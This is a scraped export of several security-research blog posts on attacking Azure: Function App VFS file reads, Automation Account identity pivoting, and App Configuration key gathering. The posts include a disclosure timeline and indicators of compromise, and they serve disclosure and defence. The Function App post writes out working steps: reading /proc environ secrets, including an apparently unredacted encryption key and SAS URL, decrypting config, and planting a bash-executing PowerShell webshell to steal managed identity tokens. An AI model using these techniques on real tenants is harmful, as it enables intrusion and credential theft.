mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environmental variables for that PID. We will then write it to a temp file and “get-content” the file to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=https://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]
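The environ file is a NUL-delimited list of KEY=VALUE pairs, so the raw bytes can also be parsed programmatically rather than eyeballed. A small Python sketch (parse_environ is an illustrative helper, not part of any tooling above):

```python
def parse_environ(raw: bytes) -> dict:
    """Parse /proc/<pid>/environ contents (NUL-separated KEY=VALUE pairs)."""
    env = {}
    for entry in raw.split(b"\x00"):
        if not entry:
            continue
        # Split on the first '=' only; values may themselves contain '='.
        key, _, value = entry.partition(b"=")
        env[key.decode()] = value.decode()
    return env
```

Feeding it the downloaded file contents yields a dictionary keyed by variable name, which makes grabbing the two values below straightforward.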

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone who has read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"AllowedOrigins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuthClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 
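Pulling those values out of the decrypted context can be scripted. The sketch below assumes the JSON layout shown above; the function name and output keys are illustrative.

```python
import json

def extract_secrets(decrypted_context: str) -> dict:
    """Pull the most useful fields out of the decrypted start-context blob."""
    ctx = json.loads(decrypted_context)
    env = ctx.get("Environment", {})
    host = ctx.get("Secrets", {}).get("Host", {})
    return {
        "storage_connection": env.get("AzureWebJobsStorage"),
        "scm_package_sas": env.get("SCM_RUN_FROM_PACKAGE"),
        "master_key": host.get("Master"),
        "default_function_key": host.get("Function", {}).get("default"),
    }
```

The "master_key" value is what we carry forward into the next step.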

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 

To overwrite the function, we will use Burp Suite to send a PUT request with our new code. Before we do that, we need to make an initial request for the function code to get the associated ETag to use with the PUT request.

Initial GET of the Function Code:

GET /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 

HTTP/1.1 200 OK 
Content-Type: application/octet-stream 
Date: Wed, 21 Sep 2022 23:29:01 GMT 
Server: Kestrel 
ETag: "38aaebfb279cda08" 
Last-Modified: Wed, 21 Sep 2022 23:21:17 GMT 
Content-Length: 852 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 
[Truncated] 
}) 

PUT Overwrite Request Using the ETag as the "If-Match" Header:

PUT /admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1 HTTP/1.1 
Host: vfspoc2.azurewebsites.net 
x-functions-key: Q[REDACTED]= 
Content-Length: 851 
If-Match: "38aaebfb279cda08" 

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed a request." 

# Interact with query parameters or the body of the request. 
$name = $Request.Query.Name 
if (-not $name) { 
    $name = $Request.Body.Name 
} 

$body = "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 

if ($name) { 
    $cmdoutput = [string](bash -c $name) 
    $body = (-join("Executed Command: ",$name,"`nCommand Output: ",$cmdoutput)) 
} 

# Associate values to output bindings by calling 'Push-OutputBinding'. 
Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ 
    StatusCode = [HttpStatusCode]::OK 
    Body = $body 
}) 


HTTP Response: 

HTTP/1.1 204 No Content 
Date: Wed, 21 Sep 2022 23:32:32 GMT 
Server: Kestrel 
ETag: "c243578e299cda08" 
Last-Modified: Wed, 21 Sep 2022 23:32:32 GMT

The server should respond with a 204 No Content, and an updated ETag for the file. With our newly updated function, we can start executing commands. 
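The same GET-then-PUT sequence can also be scripted. The Python sketch below only builds the two requests with the standard library; the function path and header names are taken from the Burp requests above, the helper names are ours, and actually sending the requests with urllib.request.urlopen is omitted.

```python
import urllib.request

# Path of the function code on the container, per the requests above.
VFS_PATH = "/admin/vfs/home/site/wwwroot/HttpTrigger1/run.ps1"

def build_get_request(base_url, function_key):
    """GET the current function code; the response carries the ETag."""
    return urllib.request.Request(
        base_url + VFS_PATH, headers={"x-functions-key": function_key}
    )

def build_put_request(base_url, function_key, etag, new_code):
    """PUT replacement code, presenting the ETag in an If-Match header."""
    return urllib.request.Request(
        base_url + VFS_PATH,
        data=new_code.encode(),
        method="PUT",
        headers={"x-functions-key": function_key, "If-Match": etag},
    )
```

Sending the GET, reading the ETag response header, then sending the PUT reproduces the Burp workflow; a 204 response again indicates the overwrite succeeded.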

Sample URL: 

https://vfspoc2.azurewebsites.net/api/HttpTrigger1?name=whoami&code=Q[REDACTED]= 

Browser Output: 

Browser output for the command "whoami."

Now that we have full control over the Function App container, we can potentially make use of any attached Managed Identities and generate tokens for them. In our case, we will just add the following PowerShell code to the function to set the output to the management token we’re trying to export. 

$resourceURI = "https://management.azure.com" 
$tokenAuthURI = $env:IDENTITY_ENDPOINT + "?resource=$resourceURI&api-version=2019-08-01" 
$tokenResponse = Invoke-RestMethod -Method Get -Headers @{"X-IDENTITY-HEADER"="$env:IDENTITY_HEADER"} -Uri $tokenAuthURI 
$body = $tokenResponse.access_token

Example Token Exported from the Browser: 

Example token exported from the browser.

For more information on taking over Azure Function Apps, check out this fantastic post by Bill Ben Haim and Zur Ulianitzky: 10 ways of gaining control over Azure function Apps.  

Conclusion 

Let's recap the issue:  

  1. Start as a user with the Reader role on a Function App. 
  1. Abuse the undocumented VFS API to read arbitrary files from the containers.
  1. Access encryption keys on the Windows containers or access the “proc” files from the Linux Container.
  1. Using the Linux container, read the process environmental variables. 
  1. Use the variables to access configuration information in a SAS token URL. 
  1. Decrypt the configuration information with the variables. 
  1. Use the keys exposed in the configuration information to overwrite the function and gain command execution in the Linux Container. 

All this being said, we submitted this issue through MSRC, and they were able to remediate the file access issues. The APIs are still there, so you may be able to get access to some of the Function App container and application files with the appropriate role, but the APIs are now restricted for the Reader role. 

MSRC timeline

The initial disclosure for this issue, focusing on Windows containers, was sent to MSRC on Aug 2, 2022. A month later, we discovered the additional impact related to the Linux containers and submitted a secondary ticket, as the impact was significantly higher than initially discovered and the different base container might require a different remediation.  

There were a few false starts on the remediation date, but eventually the vulnerable API was restricted for the Reader role on January 17, 2023. On January 24, 2023, Microsoft rolled back the fix after it caused some issues for customers. 

On March 6, 2023, Microsoft reimplemented the fix to address the issue. The rollout was completed globally on March 8. At the time of publishing, the Reader role no longer has the ability to read files with the Function App VFS APIs. It should be noted that the Linux escalation path is still a viable option if an attacker has command execution on a Linux Function App. 

[post_title] => Escalating Privileges with Azure Function Apps [post_excerpt] => Explore how undocumented APIs used by the Azure Function Apps Portal menu allowed for directory traversal on the Function App containers. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-function-apps [to_ping] => [pinged] => [post_modified] => 2023-03-23 08:24:38 [post_modified_gmt] => 2023-03-23 13:24:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29749 [menu_order] => 126 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 29393 [post_author] => 10 [post_date] => 2023-02-16 09:00:00 [post_date_gmt] => 2023-02-16 15:00:00 [post_content] =>

Intro 

Azure Automation Accounts are a frequent topic on the NetSPI technical blog. To the point that we compiled our research into a presentation for the DEFCON 30 cloud village and the Azure Cloud Security Meetup Group. We're always trying to find new ways to leverage Automation Accounts during cloud penetration testing. To automate enumerating our privilege escalation options, we looked at how Automation Accounts handle authenticating as other accounts within a runbook, and how we can abuse those authentication connections to pivot to other Azure resources.

Passing the Identity in Azure Active Directory 

As a primer: an Azure Active Directory (AAD) identity (User, App Registration, or Managed Identity) can have a role (e.g., Contributor) on an Automation Account that allows it to modify the account. The Automation Account can have attached identities that allow the account to authenticate to Azure AD as those identities. Once authenticated as the identity, the Automation Account runbook code will run any Azure commands in the context of the identity. If that identity has additional (or different) permissions from those of the AAD user that is writing the runbook, the AAD user can abuse those permissions to escalate or move laterally.

Simply put, Contributor on the Automation Account allows an attacker to be any identity attached to the Automation Account. These attached identities can have additional privileges, leading to a privilege escalation for the original Contributor account. 

Available Identities for Azure Automation Accounts 

There are two types of identities available for Automation Accounts: Run As Accounts and Managed Identities. The Run As Accounts will be deprecated on September 30, 2023, but they have been a source of several issues since they were introduced. When initially created, a Run As Account will be granted the Contributor role on the subscription it is created in.  

These accounts are also App Registrations in Azure Active Directory that use certificates for authentication. These certificates can be extracted from Automation Accounts with a runbook and used for gaining access to the Run As Account. This is also helpful for persistence, as App Registrations typically don’t have conditional access restrictions applied. 

For more on Azure Privilege Escalation using Managed Identities, check out this blog.

Screenshot of the Run As account type, one of two identities available for Azure Automation Accounts.

Managed Identities are the currently recommended option for using an execution identity in Automation Account runbooks. Managed Identities can either be system-assigned or user-assigned. System-assigned identities are tied to the resource that they are created for and cannot be shared between resources. User-assigned Managed Identities are a subscription level resource that can be shared across resources, which is handy for situations where resources, like multiple App Services applications, require shared access to a specific resource (Storage Account, Key Vault, etc.). Managed Identities are a more secure option for Automation Account Identities, as their access is temporary and must be generated from the attached resource.

A description of a system-assigned identity in Azure Automation Account.

Since Automation Accounts are frequently used to automate actions in multiple subscriptions, they are often granted roles in other subscriptions, or on higher level management groups. As attackers, we like to look for resources in Azure that can allow for pivoting to other parts of an Azure tenant. To help in automating this enumeration of the identity privileges, we put together a PowerShell script. 

Automating Privilege Enumeration 

The Get-AzAutomationConnectionScope function in MicroBurst is a relatively simple PowerShell script that uses the following logic:

  • Get a list of available subscriptions 
    • For each selected subscription 
      • Get a list of available connections (Run As or Managed Identity) 
      • Build the Automation Account runbook to authenticate as the connection, and list available subscriptions and available Key Vaults 
      • Upload and run the runbook 
      • Retrieve the output and return it
      • Delete the runbook 
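The core of the uploaded runbook boils down to a few lines of Az PowerShell. The sketch below is an illustrative reconstruction of that logic for a Managed Identity connection, not the actual MicroBurst code (a Run As connection would instead authenticate with Connect-AzAccount -ServicePrincipal and the stored certificate):

```powershell
# Runs inside the Automation Account sandbox as the attached identity
Connect-AzAccount -Identity | Out-Null

# Enumerate every subscription this identity can see
Get-AzSubscription | ForEach-Object {
    Set-AzContext -Subscription $_.Id | Out-Null
    Write-Output ("Subscription: " + $_.Name)

    # List the Key Vaults visible in this subscription
    Get-AzKeyVault | ForEach-Object {
        Write-Output ("    Key Vault: " + $_.VaultName)
    }
}
```

The runbook output (written via Write-Output) is what the wrapper script retrieves and parses before deleting the runbook.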

In general, we are going to create a "malicious" automation runbook that goes through all the available identities in the Automation Account to tell us the available subscriptions and Key Vaults. Since the Key Vaults utilize a secondary access control mechanism (Access Policies), the script will also review the policies for each available Key Vault and report back any that have entries for our current identity. While a Contributor on a Key Vault can change these Access Policies, it is helpful to know which identities already have Key Vault access. 

The usage of the script is simple. Just authenticate to the Az PowerShell module (Connect-AzAccount) as a Contributor on an Automation Account and run “Get-AzAutomationConnectionScope”. The verbose flag is very helpful here, as runbooks can take a while to run, and the verbose status update is nice.

PowerShell script for automating the enumeration of identity privileges.

Note that this will also work for cross-tenant Run As connections. As a proof of concept, we created a Run As account in another tenant (see “Automation Account Connection – dso” above), uploaded the certificate and authentication information (Application ID and Tenant) to our Automation Account, and the connection was usable with this script. This can be a convenient way to pivot to other tenants that your Automation Account is responsible for. That said, it's rare for us to see a cross-tenant connection like that.

As a final note on the script, the "Classic Run As" connections in an older Automation Account will not work with this script. They may show up in your output, but they require additional authentication logic in the runbook, and given the low likelihood of their usage, we've opted to avoid adding the logic in for those connections. 

Indicators of Compromise 

To help out the Azure defenders, here is a rough outline of how this script's activity would look in a subscription/tenant from an incident response perspective: 

  1. Initial Account Authentication 
    a.   User/App Registration authenticates via the Az PowerShell cmdlets 
  2. Subscriptions / Automation Accounts Enumerated 
    a.   The script has you select an available subscription to test, then lists the available Automation Accounts to select from 
  3. Malicious Runbook draft is created in the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/write
    b.   Microsoft.Automation/automationAccounts/runbooks/draft/write 
  4. Malicious Runbook is published to the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/publish/action 
  5. Malicious Runbook is executed as a job
    a.   Microsoft.Automation/automationAccounts/jobs/write 
  6. Run As connections and/or Managed Identities should show up as authentication events 
  7. Malicious Runbook is deleted from the Automation Account
    a.   Microsoft.Automation/automationAccounts/runbooks/delete 
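Defenders can hunt for this sequence in the Activity Log with the Az cmdlets. A rough sketch (the time window is arbitrary, and the shape of the OperationName property varies across Az.Monitor versions, so treat this as illustrative):

```powershell
# Pull a week of Activity Log events and flag runbook/job lifecycle operations
Get-AzActivityLog -StartTime (Get-Date).AddDays(-7) |
    Where-Object { "$($_.OperationName)" -match 'automationAccounts/(runbooks|jobs)/' } |
    Select-Object EventTimestamp, Caller, OperationName, ResourceId
```

A short burst of runbook write, publish, job, and delete events from a single caller matches the pattern outlined above.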

Providing the full rundown is a little beyond the scope of this blog, but Lina Lau (@inversecos) has a great blog on detections for Automation Accounts that covers a persistence technique I outlined in an earlier article, Maintaining Azure Persistence via Automation Accounts. Lina’s blog should also cover most of the steps that we have outlined above. 

For additional detail on Automation Account attack paths, take a look at Andy Robbins’ blog, Managed Identity Attack Paths, Part 1: Automation Accounts.

Conclusion 

While Automation Account identities are often a necessity for automating actions in an Azure tenant, they can allow a user (with the correct role) to abuse the identity permissions to escalate and/or pivot to other subscriptions.

The function outlined in this blog should be helpful for enumerating potential pivot points from an existing Automation Account where you have Contributor access. From here, you could create custom runbooks to extract credentials, or pivot to Virtual Machines that your identity has access to. Alternatively, defenders can use this script to see the potential blast radius of a compromised Automation Account in their subscriptions. 

Ready to improve your Azure security? Explore NetSPI’s Azure Cloud Penetration Testing solutions. Or check out these blog posts for more in-depth research on Azure Automation Accounts:  

[post_title] => Pivoting with Azure Automation Account Connections [post_excerpt] => Discover a helpful function for enumerating potential pivot points from an existing Azure Automation Account with Contributor level access. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-automation-account-connections [to_ping] => [pinged] => [post_modified] => 2023-02-15 11:38:52 [post_modified_gmt] => 2023-02-15 17:38:52 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29393 [menu_order] => 138 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 28955 [post_author] => 10 [post_date] => 2022-12-08 10:00:00 [post_date_gmt] => 2022-12-08 16:00:00 [post_content] =>

Most Azure environments that we test contain multiple kinds of application hosting services (App Services, AKS, etc.). As these applications grow and scale, we often find that the application configuration parameters will be shared between the multiple apps. To help with this scaling challenge, Microsoft offers the Azure App Configuration service. The service allows Azure users to create key-value pairs that can be shared across multiple application resources. In theory, this is a great way to share non-sensitive configuration values across resources. In practice, we see these configurations expose sensitive information to users with permission to read the values.

TL;DR

The Azure App Configuration service can often hold sensitive data values. This blog post outlines gathering and using access keys for the service to retrieve the configuration values.

What are App Configurations?

The App Configuration service is a very simple service: provide an Id and Secret to an “azconfig.io” endpoint and get back a list of key-value pairs that integrate into your application environment. This is a convenient way to share configuration information across multiple applications, but we have frequently found sensitive information (keys, passwords, connection strings) in these configuration values. This is a known problem, as Microsoft specifically calls out secret storage in their documentation, noting Key Vaults as the recommended secure solution.

Gathering Access Keys

Within the App Configuration service, two kinds of access keys (Read-write and Read-only) can be used for accessing the service and the configuration values. Additionally, Read-write keys allow you to change the stored values, so access to these keys could allow for additional attacks on applications that take action on these values. For example, by modifying a stored value for an “SMBSHAREHOST” parameter, we might be able to force an application to initiate an SMB connection to a host that we control. This is just one example, but depending on how these values are utilized, there is potential for further attacks. 

Regardless of the type of key that an attacker acquires, either one grants access to the configuration values. Much like the other key-based authentication services in Azure, you are also able to regenerate these keys. This is particularly useful if your keys are ever unintentionally exposed.

To read these keys, you will need Contributor role access to the resource or access to a role with the “Microsoft.AppConfiguration/configurationStores/ListKeys/action” action.

From the portal, you can copy out the connection string directly from the “Access keys” menu.

An example of the portal in an App Configuration service.

This connection string will contain the Endpoint, Id, and Secret, which can all be used together to access the service.
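Pulling those three parts out of a connection string is straightforward. A small sketch (the connection string below is a made-up placeholder):

```powershell
# Placeholder connection string - format: Endpoint=...;Id=...;Secret=...
$connectionString = 'Endpoint=https://example.azconfig.io;Id=exampleId;Secret=bXlGYWtlU2VjcmV0VmFsdWU='

# Split it into a hashtable of its three parts
$parts = @{}
foreach ($pair in $connectionString -split ';') {
    $name, $value = $pair -split '=', 2
    $parts[$name] = $value
}

$parts['Endpoint']   # the azconfig.io endpoint for this store
```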

Alternatively, using the Az PowerShell cmdlets, we can list out the available App Configurations (Get-AzAppConfigurationStore) and for each configuration store, we can get the keys (Get-AzAppConfigurationStoreKey). This process is also automated by the Get-AzPasswords function in MicroBurst with the “AppConfiguration” flag.
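That Az PowerShell enumeration can be sketched roughly as follows (assuming the Az.AppConfiguration module is installed; the resource group is parsed out of the resource Id):

```powershell
# Enumerate every App Configuration store in the current subscription
Get-AzAppConfigurationStore | ForEach-Object {
    $store = $_
    $resourceGroup = ($store.Id -split '/')[4]   # .../resourceGroups/<name>/...

    # List the Read-write and Read-only access keys for each store
    Get-AzAppConfigurationStoreKey -Name $store.Name -ResourceGroupName $resourceGroup |
        ForEach-Object {
            [pscustomobject]@{
                Store            = $store.Name
                KeyName          = $_.Name
                ConnectionString = $_.ConnectionString
            }
        }
}
```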

An example of an app configuration access key found in public data sources.

Finally, if you don’t have initial access to an Azure subscription to collect these access keys, we have found App Configuration connection strings in web applications (via directory traversal/local file include attacks) and in public GitHub repositories. A cursory search of public data sources results in a fair number of hits, so there are a few access keys floating around out there.

Using the Keys

Typically, these connection strings are tied to an application environment, so the code environment makes the calls out to Azure to gather the configurations. When initially looking into this service, we used a Microsoft Learn example application with our connection string and proxied the application traffic to look at the request out to azconfig.io.

This initial look into the azconfig.io API calls showed that we needed to use the Id and Secret to sign the requests with a SHA256-HMAC signature. Conveniently, Microsoft provides documentation on how we can do this. Using this sample code, we added a new function to MicroBurst to make it easier to request these configurations.
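As a sketch of how that signing works (the endpoint, Id, and Secret below are placeholders, and the request itself is left commented out), the documented scheme hashes the request body, builds a string-to-sign from the method, path, date, host, and body hash, then HMACs it with the base64-decoded Secret:

```powershell
# Placeholder credentials - normally parsed from the connection string
$endpoint = 'https://example.azconfig.io'
$id       = 'exampleId'
$secret   = 'bXlGYWtlU2VjcmV0VmFsdWU='   # base64, as issued by the service

$method       = 'GET'
$pathAndQuery = '/kv?api-version=1.0'
$utcNow       = [DateTime]::UtcNow.ToString('r')   # RFC1123 date
$hostName     = ([Uri]$endpoint).Host

# SHA256 hash of the (empty) request body, base64 encoded
$sha256      = [System.Security.Cryptography.SHA256]::Create()
$contentHash = [Convert]::ToBase64String($sha256.ComputeHash([byte[]]@()))

# String-to-sign: METHOD, path+query, then date;host;content-hash
$stringToSign = "$method`n$pathAndQuery`n$utcNow;$hostName;$contentHash"

# Sign with the base64-decoded Secret
$hmac      = [System.Security.Cryptography.HMACSHA256]::new([Convert]::FromBase64String($secret))
$signature = [Convert]::ToBase64String($hmac.ComputeHash([Text.Encoding]::UTF8.GetBytes($stringToSign)))

$headers = @{
    'x-ms-date'           = $utcNow
    'x-ms-content-sha256' = $contentHash
    'Authorization'       = "HMAC-SHA256 Credential=$id&SignedHeaders=x-ms-date;host;x-ms-content-sha256&Signature=$signature"
}
# Invoke-RestMethod -Uri ($endpoint + $pathAndQuery) -Headers $headers
```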

The Get-AzAppConfiguration function (in the “Misc” folder) can be used with the connection string to dump all the configuration values from an App Configuration.

A list of configuration values from the Get-AzAppConfiguration function.

In our example, I just have “test” values for the keys. As noted above, if you have the Read-write key for the App Configuration, you will be able to modify the values of any of the keys that are not set to “locked”. Depending on how these configuration values are interpreted by the application, this could lead to some pivoting opportunities.

IoCs

Since we just provided some potential attack options, we also wanted to call out any IoCs that you can use to detect an attacker going after your App Configurations:

  • Azure Activity Log - List Access Keys
    • Category – “Administrative”
    • Action – “Microsoft.AppConfiguration/configurationStores/ListKeys/action”
    • Status – “Started”
    • Caller – < UPN of account listing keys>
An example of an app configuration audit log, capturing details of the account used to access data.
  • App Configuration Service Logs

Conclusions

We showed you how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. This will hopefully give Azure pentesters something to work with if they run into an App Configuration connection string, and give defenders areas to look at to help secure their configuration environments.

For those using Azure App Configurations, make sure that you are not storing any sensitive information within your configuration values. Key Vaults are a much better solution for this and will give you additional protections (Access Policies and logging) that you don’t have with App Configurations. Finally, you can also disable access key authentication for the service and rely on Azure Active Directory (AAD) for authentication. Depending on the configuration of your environment, this may be a more secure configuration option.

Need help testing your Azure app configurations? Explore NetSPI’s Azure cloud penetration testing.

[post_title] => How to Gather Azure App Configurations [post_excerpt] => Learn how to gather access keys for App Configuration resources and how to use those keys to access the configuration key-value pairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gathering-azure-app-configurations [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:18:32 [post_modified_gmt] => 2023-03-16 14:18:32 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28955 [menu_order] => 169 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 27487 [post_author] => 10 [post_date] => 2022-03-17 08:00:00 [post_date_gmt] => 2022-03-17 13:00:00 [post_content] =>

On the NetSPI blog, we often focus on Azure Automation Accounts. They offer a fair amount of attack surface area during cloud penetration tests and are a great source for privilege escalation opportunities.  

During one of our recent Azure penetration testing assessments, we ran into an environment that was using Automation Account Hybrid Workers to run automation runbooks on virtual machines. Hybrid Workers are an alternative to the traditional Azure Automation Account container environment for runbook execution. Outside of the “normal” runbook execution environment, automation runbooks need access to additional credentials to interact with Azure resources. This can lead to a potential privilege escalation scenario that we will cover in this blog.

TL;DR

Azure Hybrid Workers can be configured to use Automation Account “Run as” accounts, which can expose the credentials to anyone with local administrator access to the Hybrid Worker. Since “Run as” accounts are typically subscription contributors, this can lead to privilege escalation from multiple Azure Role-Based Access Control (RBAC) roles.

What are Azure Hybrid Workers?

